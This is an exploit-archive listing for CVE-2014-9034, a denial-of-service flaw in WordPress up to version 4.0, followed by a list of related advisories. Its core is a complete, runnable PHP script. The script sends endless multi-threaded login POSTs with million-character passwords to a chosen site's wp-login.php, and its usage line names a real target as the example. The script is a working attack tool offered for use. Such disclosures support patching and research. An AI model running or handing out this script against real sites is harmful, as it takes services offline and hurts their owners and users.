Lucene search
John MartinelliPACKETSTORM:129316HistoryNov 29, 2014 - 12:00 a.m.
WordPress 4.0 Denial Of Service
2014-11-2900:00:00
John Martinelli
packetstormsecurity.com
32
0.283 Low
EPSS
Percentile
96.4%
`<?php
echo "\nCVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability\n";
echo "Proof-of-Concept developed by [email protected] (http://secureli.com)\n\n";
echo "usage: php wordpressed.php domain.com username numberOfThreads\n";
echo " e.g.: php wordpressed.php wordpress.org admin 50\n\n";
echo "Sending POST data (username: " . $argv[2] . "; threads: " . $argv[3] . ") to " . $argv[1];
do {
$multi = curl_multi_init();
$channels = array();
for ($x = 0; $x < $argv[3]; $x++) {
$ch = curl_init();
$postData = array(
'log' => $argv[2],
'pwd' => str_repeat("A",1000000),
'redirect_to' => $argv[1] . "/wp-admin/",
'reauth' => 1,
'testcookie' => '1',
'wp-submit' => "Log%20In");
$cookieFiles = "cookie.txt";
curl_setopt_array($ch, array(
CURLOPT_HEADER => 1,
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
CURLOPT_REFERER => $argv[1] . "/wp-admin/",
CURLOPT_COOKIEJAR => $cookieFiles,
CURLOPT_COOKIESESSION => true,
CURLOPT_URL => $argv[1] . '/wp-login.php',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $postData,
CURLOPT_FOLLOWLOCATION => true));
curl_multi_add_handle($multi, $ch);
$channels[$x] = $ch;
}
$active = null;
do {
$mrc = curl_multi_exec($multi, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
while ($active && $mrc == CURLM_OK) {
do {
$mrc = curl_multi_exec($multi, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
}
foreach ($channels as $channel) {
curl_multi_remove_handle($multi, $channel);
}
curl_multi_close($multi);
echo ".";
} while (1==1);
?>
`
Related
patchstack
patchstack
WordPress <=4.0.1 - Denial of Service Attacks
2014-12-01 00:00:00
veracode
veracode
Denial Of Service(DoS) Via CPU Consumption
2017-08-10 08:10:58
wpvulndb
wpvulndb
WordPress <= 4.0 - Long Password Denial of Service (DoS)
2014-11-20 20:02:12
zdt
zdt
WordPress 4.0 Denial Of Service Exploit
2014-12-01 00:00:00
securityvulns
securityvulns
WordPress <=4.0 Denial of Service Exploit (CVE-2014-9034)
2014-12-01 00:00:00
[ MDVSA-2014:233 ] wordpress
2014-12-01 00:00:00
metasploit
metasploit
WordPress Long Password DoS
2015-01-04 18:50:23
exploitpack
exploitpack
WordPress 4.0 - Denial of Service
2014-12-01 00:00:00
exploitdb
exploitdb
WordPress Core 4.0 - Denial of Service
2014-12-01 00:00:00
packetstorm
packetstorm
Drupal / WordPress Memory Exhaustion
2014-12-01 00:00:00
prion
prion
Design/Logic Flaw
2014-11-25 23:59:00
ubuntucve
ubuntucve
CVE-2014-9034
2014-11-25 00:00:00
openvas
openvas
Drupal Password Hashing Denial of Service Vulnerability
2014-12-09 00:00:00
Debian: Security Advisory (DSA-3085-1)
2014-12-02 00:00:00
Debian Security Advisory DSA 3085-1 (wordpress - security update)
2014-12-03 00:00:00
debiancve
debiancve
CVE-2014-9034
2014-11-25 23:59:00
cve
cve
CVE-2014-9034
2014-11-25 23:59:00
nessus
nessus
Debian DSA-3085-1 : wordpress - security update
2014-12-04 00:00:00
osv
osv
wordpress - security update
2014-12-03 00:00:00
wordpress - security update
2015-06-01 00:00:00
debian
debian
[SECURITY] [DSA 3085-1] wordpress security update
2014-12-03 08:38:56
[SECURITY] [DLA 236-1] wordpress security update
2015-06-01 12:11:28
freebsd
freebsd
wordpress -- multiple vulnerabilities
2014-11-25 00:00:00
mageia
mageia
Updated wordpress package fixes security vulnerabilities
2014-11-26 20:29:06